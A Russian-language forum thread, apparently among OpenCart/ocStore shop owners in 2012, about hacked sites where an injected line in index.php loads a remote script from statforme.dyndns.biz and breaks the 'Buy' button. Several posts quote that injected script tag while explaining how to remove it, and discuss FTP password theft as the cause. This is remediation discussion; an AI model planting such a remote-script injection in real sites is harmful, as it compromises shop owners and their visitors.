Если у вас не работает кнопка "Купить" (Вирус на сайте)

[toevgen]

Сегодня ко мне обратились заказчики интернет магазина "mag-shop.ru" У них перестали работать кнопки купить. Я 3 часа разбирался, и выяснил следующее. В нашем с вами скрипте интернет-магазина есть дыра через которую злоумышленники добавлят свой код. Масштабы пока оценить невозможно. Разобрался пока как удалить вредноносный код который отключает кнопку купить.

Посмотрите исходный код. В самом низу появляется код <script src="http://statforme.dyndns.biz/rss.js"></script> это и есть вирус.

Удалить его можно отредактировав в корне сайта index.php в самом низу

// Output

$response->output();

echo '<script src="http://statforme.dyndns.biz/rss.js"></script>';

?>

Нужно сделать

// Output

$response->output();

?>

[toevgen]

Посмотрел на еще один интернет-магазин www.pk-volk.ru Такая же беда. Хорошо хоть разобрался в чем дело.

[romign]

Думаю дело не в дыре OC, а в том, что заказчику стоить более ответственно относиться к сохранности своих данных, а именно к паролям от FTP.

[VinovNick]

Привет народ. Зарегался специально чтоб отписать. Такая же беда случилась и у меня. Сначала обнаружил эту фигню на одном интернет-магазине. Исправил, вздохнул с облегчением, успокоился, так как на хостинге писали что возможна кража паролей фтп, измените пароли и тра-та-та, будьте осторожны. Потом полез по всем сайтам которые делал, обнаружил что еще два сайта заболели такой же фигней. Так же все исправил. Посмотрел в логах и по датам последнего изменения файла index.php, дата изменения на всех трех сайтах оказалась одинаковой. Вот незнаю что и думать..толи я баран, каким-то образом профукал сразу три учетки фтп, толи какой-то шняго вирус сидит на компе и шуршит в то время когда подключаюсь по фтп к сайтам(клиент файлзилла).

[romign]

Привет народ. Зарегался специально чтоб отписать. Такая же беда случилась и у меня. Сначала обнаружил эту фигню на одном интернет-магазине. Исправил, вздохнул с облегчением, успокоился, так как на хостинге писали что возможна кража паролей фтп, измените пароли и тра-та-та, будьте осторожны. Потом полез по всем сайтам которые делал, обнаружил что еще два сайта заболели такой же фигней. Так же все исправил. Посмотрел в логах и по датам последнего изменения файла index.php, дата изменения на всех трех сайтах оказалась одинаковой. Вот незнаю что и думать..толи я баран, каким-то образом профукал сразу три учетки фтп, толи какой-то шняго вирус сидит на компе и шуршит в то время когда подключаюсь по фтп к сайтам(клиент файлзилла).

Можно посоветовать только провериться на вирусы парочкой антивирусов, сменить все ФТП-пароли и ждать... Если появится снова, значит искать проблему глубже.

[smaxus]

аналогичная ситуация.

ocstore_v1.5.1.3

в index.php дописана строка

echo '<script src="http://statforme.dyndns.biz/rss.js"></script>';

изменения зафиксированы 29 апреля 2012.

резонный вопрос к разработчикам: где дырка?

[VinovNick]

Настораживает такая ситуация..ранее не замечал таких косяков..

[smaxus]

причем в логах ftp

с левого ip остались

login

download index.php

upload index.php

logout

такая вот картина.

поставил фильтр на ip для ftp, но дырка то остается

[NathanD]

причем в логах ftp

с левого ip остались

login

download index.php

upload index.php

logout

такая вот картина.

поставил фильтр на ip для ftp, но дырка то остается

ну и какая связь между ftp провайдера и opencart? по статистике взлома различных сайтов на различных движках - практически в 100% случаев причина взлома сайта - трояны которые спокойно живут на компах пользователей откуда пароли и воруют, вторая причина - ошибки кода и бэкдоры в сторонних модулях независимых разработчиков - это меньше процента уязвимостей, а дыры в движках - вообще тысячные доли процента. Берём на оффсайте бесплатные Kaspersky Virus Removal Tool и CureIt и проверяем свой комп... (обеими прогами)

p.s. и ещё дельный совет, а точнее незыблемое правило - никогда не сохраняйте в ftp менеджерах пароли, только ручной ввод.

[freelancer]

аналогичная ситуация.

ocstore_v1.5.1.3

в index.php дописана строка

echo '<script src="http://statforme.dyndns.biz/rss.js"></script>';

изменения зафиксированы 29 апреля 2012.

резонный вопрос к разработчикам: где дырка?

причем в логах ftp

с левого ip остались

login

download index.php

upload index.php

logout

такая вот картина.

вот сами и ответили на свой вопрос. дырка в ftp

[toevgen]

Согласен с freelancer. Это последствия кражи паролей от FTP. Вывод: 1.Лечить комп. 2. Менять пароли на FTP.

[Гість brk]

Согласен с freelancer. Это последствия кражи паролей от FTP. Вывод: 1.Лечить комп. 2. Менять пароли на FTP.

Менять сам FTP на SFTP

[risha]

Нашла у себя точно такой же код и тоже файл изменен 29 апреля, вход был с IP 46.16.168.246.

Только вот у меня прописано вконце index.php:

print $out;

echo '<script src="http://statforme.dyndns.biz/rss.js"></script>';

?>

не подскажете как его убрать? удалить строки? или одну из строк?

[fuckyou8545]

У меня не работает конпка "купить", но не из-за этого. В чем еще может быть проблема?

[Baco]

Дайте кто нибудь код самого вируса, уж очень большая интрига его действий...

[Marianna]

у меня вируса в файле индекс нет, но кнопка купить сломалась на странице с самим товаром, в списке или с главной работает, а в самих товарах нет, какие файлы отвечают за кнопку купить в товаре? Может это я с чем-то перемудрила.

Методом тыка выяснила что ломал эту кнопку файл моя темаcatalogviewthemeshirttemplateproductproduct.tpl кто-то его сломал

[chikhir]

Marianna, хм, точно такая же ситуация!

[chikhir]

попробовал решение , вроде помогло!